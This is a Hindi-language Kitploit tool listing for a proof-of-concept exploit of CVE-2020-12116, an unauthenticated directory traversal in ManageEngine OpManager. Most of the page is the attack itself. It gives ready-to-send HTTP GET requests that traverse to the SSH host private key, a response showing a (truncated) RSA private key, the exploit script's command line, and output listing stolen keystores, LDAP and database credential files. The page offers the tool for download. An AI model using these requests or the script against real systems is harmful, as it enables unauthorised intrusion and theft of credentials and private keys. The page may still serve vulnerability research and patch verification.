Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-12116 — CVE-2020-12116 का शोषण करने के लिए प्रूफ ऑफ कॉन्सेप्ट कोड: ManageEngine OpManger पर अनप्रमाणित मनमाना फ़ाइल पढ़ना | Kitploit
उपकरण/GitHubGitHub/beetlechunks/cve-2020-12116
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubbeetlechunks/cve-2020-12116

CVE-2020-12116

CVE-2020-12116 का शोषण करने के लिए प्रूफ ऑफ कॉन्सेप्ट कोड: ManageEngine OpManger पर अनप्रमाणित मनमाना फ़ाइल पढ़ना

रिपॉजिटरी देखें
30106 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-12116

प्रूफ ऑफ कॉन्सेप्ट कोड CVE-2020-12116 का शोषण करने के लिए: ManageEngine OpManger पर अप्रमाणित मनमाना फ़ाइल पढ़ना।

सारांश

OpManager का नवीनतम रिलीज़ एक निर्देशिका ट्रैवर्सल भेद्यता शामिल करता है जो OpManager एप्लिकेशन में प्रत्येक फ़ाइल तक अप्रतिबंधित पहुंच की अनुमति देता है। इसमें निजी SSH कुंजियाँ, पासवर्ड-संरक्षित Java कीस्टोर, और कीस्टोर, निजी प्रमाणपत्रों और बैकएंड डेटाबेस के पासवर्ड वाली कॉन्फ़िगरेशन फ़ाइलें शामिल हैं। यदि LDAP कॉन्फ़िगर किया गया है तो "conf/OpManager/ldap.conf" से डोमेन क्रेडेंशियल प्राप्त किए जा सकते हैं।

भेद्यता विश्लेषण

ManageEngine OpManager एप्लिकेशन की रूट डायरेक्टरी में, डिफ़ॉल्ट रूप से पोर्ट 8060 पर, एक अप्रमाणित GET अनुरोध करें।

root@kitploit:~
GET / HTTP/1.1
Host: <HOSTNAME>:8060
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

प्रतिक्रिया HTML में कैश्ड जावास्क्रिप्ट "src" URL होंगे।

root@kitploit:~
<SCRIPT LANGUAGE="javascript" SRC="/cachestart/125116/cacheend/apiclient/fluidicv2/
javascript/jquery/jquery-3.4.1.min.js"></SCRIPT>

उपरोक्त उद्धरण "SRC" URL में एक निर्देशिका ट्रैवर्सल भेद्यता है जो ManageEngine रूट इंस्टॉलेशन डायरेक्टरी से मनमानी फ़ाइल पढ़ने की अनुमति देती है। डिफ़ॉल्ट रूप से इंस्टॉलेशन पथ "C:\Program Files\ManageEngine\OpManager" है।

नोट: "/cachestart/" के बाद की संख्या उत्पाद बिल्ड नंबर है, लेकिन भेद्यता का शोषण करने के लिए किसी भी संख्या का उपयोग किया जा सकता है।

प्रतिक्रिया HTML से स्क्रिप्ट स्रोत URL का लाभ उठाते हुए, एक निर्देशिका ट्रैवर्सल के साथ GET अनुरोध का उपयोग रिमोट सर्वर से मनमानी फ़ाइलें पढ़ने के लिए किया जा सकता है।

अनुरोध:

root@kitploit:~
GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: <HOSTNAME>:8060
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cache-Control: max-age=0
Referer: http://<HOSTNAME>:8060/

प्रतिक्रिया:

root@kitploit:~
HTTP/1.1 200 
Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly
X-FRAME-OPTIONS: DENY
Accept-Ranges: bytes
ETag: W/"902-1586033949624"
Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT
Vary: Accept-Encoding
Date: Mon, 13 Apr 2020 15:40:01 GMT
Connection: close
Content-Length: 902

-----BEGIN RSA PRIVATE KEY-----
MIICX...pXqnO
-----END RSA PRIVATE KEY-----

प्रदान किए गए Python3 शोषण कोड का उपयोग कर उदाहरण

अवलोकन:

root@kitploit:~
यह स्क्रिप्ट ManageEngine OpManager एंडपॉइंट के खिलाफ मनमानी फ़ाइल पढ़ने की भेद्यता का लाभ उठाकर संवेदनशील फ़ाइलों को डाउनलोड करती है, जैसे निजी कुंजियाँ, निजी कीस्टोर, प्रमाणपत्र, पासवर्ड वाली कॉन्फ़िगरेशन फ़ाइलें आदि।

कमांड:

root@kitploit:~
python3 exploit.py -t <hostname/IP> -p 8060 -d ./

आउटपुट:

root@kitploit:~
[+] bin/.ssh_host_dsa_key saved to ./bin|.ssh_host_dsa_key
[+] bin/.ssh_host_dsa_key.pub saved to ./bin|.ssh_host_dsa_key.pub
[+] bin/.ssh_host_rsa_key saved to ./bin|.ssh_host_rsa_key
[+] bin/.ssh_host_rsa_key.pub saved to ./bin|.ssh_host_rsa_key.pub
[+] conf/client.keystore saved to ./conf|client.keystore
[+] conf/customer-config.xml saved to ./conf|customer-config.xml
[+] conf/database_params.conf saved to ./conf|database_params.conf
[+] conf/FirewallAnalyzer/aaa_auth-conf.xml saved to ./conf|FirewallAnalyzer|aaa_auth-conf.xml
[+] conf/FirewallAnalyzer/auth-conf_ppm.xml saved to ./conf|FirewallAnalyzer|auth-conf_ppm.xml
[+] conf/gateway.conf saved to ./conf|gateway.conf
[+] conf/itom.truststore saved to ./conf|itom.truststore
[+] conf/netflow/auth-conf.xml saved to ./conf|netflow|auth-conf.xml
[+] conf/netflow/server.xml saved to ./conf|netflow|server.xml
[+] conf/netflow/ssl_server.xml saved to ./conf|netflow|ssl_server.xml
[+] conf/NFAEE/cs_server.xml saved to ./conf|NFAEE|cs_server.xml
[+] conf/OpManager/database_params.conf saved to ./conf|OpManager|database_params.conf
[+] conf/OpManager/database_params_DE.conf saved to ./conf|OpManager|database_params_DE.conf
[+] conf/OpManager/ldap.conf saved to ./conf|OpManager|ldap.conf
[+] conf/OpManager/MicrosoftSQL/database_params.conf saved to ./conf|OpManager|MicrosoftSQL|database_params.conf
[+] conf/OpManager/POSTGRESQL/database_params.conf saved to ./conf|OpManager|POSTGRESQL|database_params.conf
[+] conf/OpManager/POSTGRESQL/database_params_DE.conf saved to ./conf|OpManager|POSTGRESQL|database_params_DE.conf
[+] conf/OpManager/securitydbData.xml saved to ./conf|OpManager|securitydbData.xml
[+] conf/OpManager/SnmpDefaultProperties.xml saved to ./conf|OpManager|SnmpDefaultProperties.xml
[+] conf/Oputils/snmp/Community.xml saved to ./conf|Oputils|snmp|Community.xml
[+] conf/Persistence/DBconfig.xml saved to ./conf|Persistence|DBconfig.xml
[+] conf/Persistence/persistence-configurations.xml saved to ./conf|Persistence|persistence-configurations.xml
[+] conf/pmp/PMP_API.conf saved to ./conf|pmp|PMP_API.conf
[+] conf/pmp/pmp_server_cert.p12 saved to ./conf|pmp|pmp_server_cert.p12
[+] conf/product-config.xml saved to ./conf|product-config.xml
[+] conf/SANSeed.xml saved to ./conf|SANSeed.xml
[+] conf/server.keystore saved to ./conf|server.keystore
[+] conf/server.xml saved to ./conf|server.xml
[+] conf/system_properties.conf saved to ./conf|system_properties.conf
[+] conf/tomcat-users.xml saved to ./conf|tomcat-users.xml
[+] lib/OPM_APNS_Cert.p12 saved to ./lib|OPM_APNS_Cert.p12

अस्वीकरण

यह प्रूफ ऑफ कॉन्सेप्ट कोड अकादमिक अनुसंधान के लिए बनाया गया है और इसका उपयोग सिस्टम के खिलाफ करने का इरादा नहीं है, सिवाय जहां स्पष्ट रूप से अधिकृत किया गया हो। कोड जैसा है वैसा प्रदान किया गया है, इसके निष्पादन पर कोई गारंटी या वादा नहीं है। मैं इस कोड के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हूं।

टूल डाउनलोड करें